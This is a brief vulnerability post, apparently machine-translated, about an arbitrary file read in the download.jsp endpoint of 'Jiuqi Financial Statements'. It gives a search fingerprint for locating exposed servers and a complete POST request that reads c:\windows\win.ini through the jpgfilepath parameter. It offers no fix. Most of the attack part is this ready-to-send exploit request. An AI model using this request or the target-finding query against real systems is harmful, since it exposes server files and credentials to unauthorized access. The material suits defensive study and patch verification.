Jiuqi Financial Statements Download Jsp Arbitrary File Reading Vulnerability
Jiuqi Financial Statements Download Jsp Arbitrary File Reading Vulnerability
Jiuqi Financial Statements Download.jsp Any file reading vulnerability
Vulnerability Description
Jiuqi Financial Statements Download.jsp There is a vulnerability to read any file. The attacker can obtain information on the server through the vulnerability.
Vulnerability Impact
Jiuqi Financial Statements
Network surveying and mapping
body=”/netrep/”
Vulnerability reappears
The login path is as follows
Send a request packet
POST /netrep/ebook/browse/download.jsp HTTP/1.1
Host:
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
jpgfilepath=c:\windows\win.ini
This post is licensed under CC BY 4.0 by the author.